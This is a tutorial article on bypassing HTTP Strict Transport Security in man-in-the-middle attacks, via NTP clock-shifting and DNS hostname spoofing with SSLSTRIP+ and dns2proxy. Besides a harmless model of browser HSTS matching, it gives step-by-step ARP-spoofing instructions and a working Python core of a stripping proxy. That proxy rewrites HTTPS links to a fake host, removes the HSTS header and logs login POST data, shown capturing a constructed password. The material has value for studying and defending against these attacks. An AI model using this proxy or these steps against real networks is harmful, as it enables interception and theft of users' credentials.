Bypassing HTTP Strict Transport Security

A guide to (targeted) MITM attacks on HSTS protected web services

The views and opinions expressed in this document are those of the author. All material provided is intended for informational and learning purposes only and should never be used on a production environment.

HTTP Strict Transport Security (HSTS) is a security feature enabled through a response header. Once a browser receives this header over an HTTPS connection (it is ignored on plain-HTTP responses), it forces a secure connection (TLS) for that specific hostname, rewriting http:// URLs to https:// before any request leaves the machine, until the "max-age" value in the header is exceeded. This prevents attackers from stripping HTTPS links during a man-in-the-middle attack, as Moxie Marlinspike demonstrated with sslstrip at Black Hat DC 2009. Without HSTS, an attacker in the network path can replace all HTTPS links with HTTP links to keep victims on an unencrypted connection (with all its consequences).

A sample HSTS header (which works for a year in this case, because 31536000 seconds equals 1 year) would look like this:

Strict-Transport-Security: max-age=31536000

Up to now, I know of two methods to bypass this security feature. Both require the victim's browser to start with a plain-HTTP request that the attacker can intercept: an http:// link, or a typed hostname for which the browser holds no (unexpired) HSTS entry. Neither method helps against a hostname that is built into the browser's HSTS preload list: a preloaded entry is not subject to the max-age clock and is required to cover all subdomains, so only a hostname outside that domain remains.

Method 1 (intermediate, works sometimes)

The first method requires changing the time on the victim's computer. This can be accomplished with a MITM attack on the Network Time Protocol (NTP), as Jose Selvi showed in his research on HSTS (his tool for it is called Delorean). The idea is to move the date one or two years into the future while keeping the month, day and time the same. This way the victim probably won't notice the change, but the stored HSTS entry has expired, because max-age is evaluated against the victim's own clock, not the server's. The attacker can then keep the victim on an unencrypted connection by stripping https links. The clock jump does have to be accepted by the client: the reference ntpd refuses steps larger than its panic threshold (1000 seconds by default) unless it was started with -g, and I did find some articles on the web with fixes for several of the NTP behaviours this relies on in OS X and Linux. I didn't check whether this method still works, so verify it yourself before you plan to use it!

Method 2 (intermediate, should always work)

The second method is a bit more complicated. It works by changing the hostname of the website, for example www.facebook.com to wwww.facebook.com, using DNS spoofing. This is possible because HSTS entries are matched by exact hostname: the browser has a policy for www.facebook.com but none for wwww.facebook.com, so it happily talks plain HTTP to the latter, and since the fake host is only ever used over HTTP the attacker never has to present a certificate for it. This method of bypassing HSTS was introduced by Leonardo Nve at Black Hat Asia 2014 and is implemented in SSLSTRIP+ (together with dns2proxy). One thing to check first: wwww.facebook.com is not a subdomain of www.facebook.com, so an includeSubDomains directive on the www host itself does not matter, but if the parent domain (facebook.com) sends HSTS with includeSubDomains and the browser has already seen it over HTTPS, every name below facebook.com, including wwww.facebook.com, is forced to HTTPS. In that case you need a hostname outside that domain (like www.faceboook.com). A HSTS header with includeSubDomains looks like this:

Strict-Transport-Security: max-age=31536000; includeSubDomains
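To make the matching rules concrete, here is a small model of a browser's HSTS store, written for this article as an added example (it is not browser code and not part of the original page): it parses the header, stores the policy with an expiry computed from the client clock, and applies the exact-host / includeSubDomains matching of RFC 6797. The hosts, timestamps and policies in demo() are constructed; the walk-through shows which check each of the two methods defeats.

```python
# HSTS policy evaluation the way a browser does it (simplified from RFC 6797).
# Added example for this article; not browser code and not code from the page.
# Method 1 moves the client clock past the stored expiry; Method 2 asks for a
# hostname that no stored entry (or no includeSubDomains entry) covers.


def parse_hsts(header_value):
    """Parse a Strict-Transport-Security value into (max_age, include_subdomains).

    Directive names are case-insensitive; max-age is mandatory.
    """
    max_age = None
    include_subdomains = False
    for directive in header_value.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            max_age = int(value.strip().strip('"'))
        elif name == "includesubdomains":
            include_subdomains = True
    if max_age is None:
        raise ValueError("HSTS header without max-age is invalid")
    return max_age, include_subdomains


class HstsStore:
    """Per-browser memory of HSTS policies, keyed by exact hostname."""

    def __init__(self):
        # host -> (absolute expiry in seconds, include_subdomains)
        self.entries = {}

    def learn(self, host, header_value, now, over_https=True):
        """Record a policy. Browsers ignore the header on plain-HTTP responses,
        and the expiry is computed from the client's own clock ("now")."""
        if not over_https:
            return
        max_age, include_subdomains = parse_hsts(header_value)
        host = host.lower()
        if max_age == 0:                      # max-age=0 deletes the policy
            self.entries.pop(host, None)
            return
        self.entries[host] = (now + max_age, include_subdomains)

    def must_use_https(self, host, now):
        """True if the browser would refuse to send plain HTTP to this host.

        Walk from the exact name up through its superdomains: the exact entry
        always applies, a superdomain entry only if it set includeSubDomains.
        Expired entries (judged by the client clock) are skipped.
        """
        labels = host.lower().split(".")
        for i in range(len(labels)):
            entry = self.entries.get(".".join(labels[i:]))
            if entry is None:
                continue
            expires_at, include_subdomains = entry
            if now >= expires_at:
                continue
            if i == 0 or include_subdomains:
                return True
        return False


ONE_YEAR = 31536000
T0 = 1_700_000_000   # constructed "now" (seconds since the epoch)


def demo():
    """Constructed walk-through of both bypasses against a fresh store."""
    browser = HstsStore()
    # Victim visited https://www.facebook.com and got the header from the article.
    browser.learn("www.facebook.com", "max-age=31536000", T0)
    # The same header on a plain-HTTP response is ignored: no entry is created.
    browser.learn("attacker.example", "max-age=31536000", T0, over_https=False)

    results = {
        "real host, today": browser.must_use_https("www.facebook.com", T0 + 60),
        # Method 1: client clock pushed two years ahead, entry has "expired".
        "real host, clock +2y": browser.must_use_https("www.facebook.com", T0 + 2 * ONE_YEAR),
        # Method 2: sibling hostname has no entry of its own.
        "wwww.facebook.com": browser.must_use_https("wwww.facebook.com", T0 + 60),
        "http-learned host": browser.must_use_https("attacker.example", T0 + 60),
    }
    # Now the parent domain has been seen over HTTPS too, with includeSubDomains.
    browser.learn("facebook.com", "max-age=31536000; includeSubDomains", T0)
    results["wwww.facebook.com, parent has includeSubDomains"] = browser.must_use_https("wwww.facebook.com", T0 + 60)
    results["www.faceboook.com (other domain)"] = browser.must_use_https("www.faceboook.com", T0 + 60)
    return results


if __name__ == "__main__":
    for name, forced in demo().items():
        print(f"{name:50} -> {'HTTPS forced' if forced else 'plain HTTP allowed'}")
```

The two False results for the real host (clock moved forward) and for wwww.facebook.com are exactly the windows Method 1 and Method 2 open; the last two lines show why a parent-domain includeSubDomains policy closes the subdomain trick but not the other-domain one.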

First you need to make sure the victim sees you as the router, using something like ARP spoofing, so that both the victim's DNS queries and its port-80 traffic can be redirected to dns2proxy and SSLSTRIP+. After that, dns2proxy can answer queries for a fake host like wwww.facebook.com. To explain the rest as clearly as possible, I will break it into steps.

  • The victim sends a plain-HTTP request for www.facebook.com (from an http link, or because the browser holds no HSTS entry for it yet); being in the path, the attacker redirects that request to SSLSTRIP+
  • SSLSTRIP+ fetches the real content over HTTPS from www.facebook.com and returns it to the victim, but rewrites every https://www.facebook.com link in the response (and in any Location redirect) to http://wwww.facebook.com
  • The victim's browser resolves wwww.facebook.com; dns2proxy answers the query with an IP address that leads the traffic back through the attacker's proxy. The browser has no HSTS entry for this hostname, so it connects over plain HTTP
  • When the victim tries to log in, the browser POSTs the credentials to wwww.facebook.com, in the clear
  • The attacker intercepts this request as well
    • If the request method is POST, SSLSTRIP+ logs the post data
    • SSLSTRIP+ maps wwww.facebook.com back to www.facebook.com and replays the request to the real site over HTTPS
    • SSLSTRIP+ replaces all the https links in the response with http links to the fake host
    • SSLSTRIP+ returns the stripped www.facebook.com response to the victim as wwww.facebook.com
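The following is the core of the transformation described in these steps, written for this article as an added example in Python (it is not code from sslstrip+ or dns2proxy; the "wwww."/"web." renaming rule, the sample page, the headers and the POST body are all constructed). It does the HTTP-layer rewriting, keeps the fake-to-real hostname map that dns2proxy would consult at the DNS layer, and records POST data. ARP spoofing and the port-80 redirect into the proxy are outside this snippet.

```python
# Core of an SSLSTRIP+-style stripping proxy, reduced to the two transformations
# the steps above rely on: rewriting HTTPS links in upstream responses to plain-HTTP
# links on a fake hostname, and mapping that fake hostname back to the real one.
# Added example for this article; not code from sslstrip+ or dns2proxy. The
# "wwww."/"web." naming rule, the sample response and the POST body are constructed.
import re

# scheme + host only; the path after the host is left untouched
_HTTPS_URL = re.compile(r"https://([A-Za-z0-9.-]+)")


def fake_host(real):
    """Pick a hostname the browser holds no HSTS entry for (constructed rule)."""
    real = real.lower()
    return "w" + real if real.startswith("www.") else "web." + real


class StripProxy:
    def __init__(self):
        self.fake_to_real = {}   # what dns2proxy must resolve, and what we reverse
        self.captured = []       # (real_host, path, post_body) seen in plaintext

    def strip_body(self, body):
        """Rewrite every https://host link to http://fakehost, remembering the mapping."""
        def swap(match):
            real = match.group(1)
            fake = fake_host(real)
            self.fake_to_real[fake] = real
            return "http://" + fake
        return _HTTPS_URL.sub(swap, body)

    def strip_headers(self, headers):
        """Rewrite redirects to HTTPS and drop the HSTS header before it reaches the victim."""
        out = {}
        for name, value in headers.items():
            lname = name.lower()
            if lname == "strict-transport-security":
                continue                      # victim must never learn the policy
            if lname == "location":
                value = self.strip_body(value)
            out[name] = value
        return out

    def resolve(self, host):
        """The dns2proxy half: a fake name maps back to the real site."""
        return self.fake_to_real.get(host.lower(), host)

    def forward(self, method, host, path, body=None):
        """Victim's plain-HTTP request -> (scheme, host, path) to replay upstream."""
        real = self.resolve(host)
        if method.upper() == "POST":
            self.captured.append((real, path, body))   # credentials, in the clear
        return ("https", real, path)


def demo():
    """Constructed run through the steps: strip a page, then catch the login POST."""
    proxy = StripProxy()
    # Steps 1-2: upstream page (constructed) fetched over HTTPS, stripped for the victim.
    upstream_body = ('<form action="https://www.facebook.com/login.php">'
                     '<a href="https://facebook.com/">home</a>')
    upstream_headers = {"Strict-Transport-Security": "max-age=31536000",
                        "Location": "https://www.facebook.com/home"}
    stripped_body = proxy.strip_body(upstream_body)
    stripped_headers = proxy.strip_headers(upstream_headers)
    # Steps 4-5: victim submits the form to the fake host over plain HTTP.
    target = proxy.forward("POST", "wwww.facebook.com", "/login.php",
                           "email=victim&pass=hunter2")
    return stripped_body, stripped_headers, target, proxy.captured


if __name__ == "__main__":
    body, headers, target, captured = demo()
    print(body)
    print(headers)
    print("replayed to:", target)
    print("captured:", captured)
```

Note that the Location rewrite matters as much as the body rewrite: the real site answers a plain-HTTP request with a redirect to https://, and if that header reached the victim unchanged the browser would follow it straight into TLS and the attack would end there.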